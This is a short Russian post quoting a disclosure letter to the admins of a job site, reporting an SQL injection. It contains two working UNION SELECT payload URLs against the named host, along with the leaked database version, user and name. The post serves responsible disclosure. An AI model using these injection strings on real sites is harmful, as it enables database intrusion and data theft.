Письмо админам ресурса.. было отправлено более недели назад
Здравствуйте, уважаемые!
Довожу до Вашего сведения, что в вашем движке, которому соответствет URL
job.i-files.org, мною обнаружена уязвимость класса SQL-Injection,
позволяющая выполнить произвольный SQL-запрос в базе данных приложения с правами соответствующего пользователя. Пример уязвимости:
1)
http://job.i-files.org/?do=details&id=-448601+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13, 14,concat_ws(0x3A,%20version(),%20user(),%20databa se()),16,17,18,19,20,21,22,23,24/*'&q=%F3&vac=1&razd=0&city=0&photo=0&salary=0&fmt= 2¤cy=0&last_s_id=0
'
5.0.32-Debian_7etch1-log:job@mail.101.com.ua:job
2)
http://job.i-files.org/?do=details&id=-448601+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13, 14,concat_ws(0x3A,table_name,table_schema),16,17,1 8,19,20,21,22,23,24+from+information_schema.tables +where+table_name+like+'%25user%25'/*'&q=%F3&vac=1&razd=0&city=0&photo=0&salary=0&fmt= 2¤cy=0&last_s_id=0
'
ну и так далее)
Прощу принять во внимание предоставленную информацию, и принять меры к
устранению уязвимости пока это не привело к плачевным результатам.
з.ы. админы уведомлены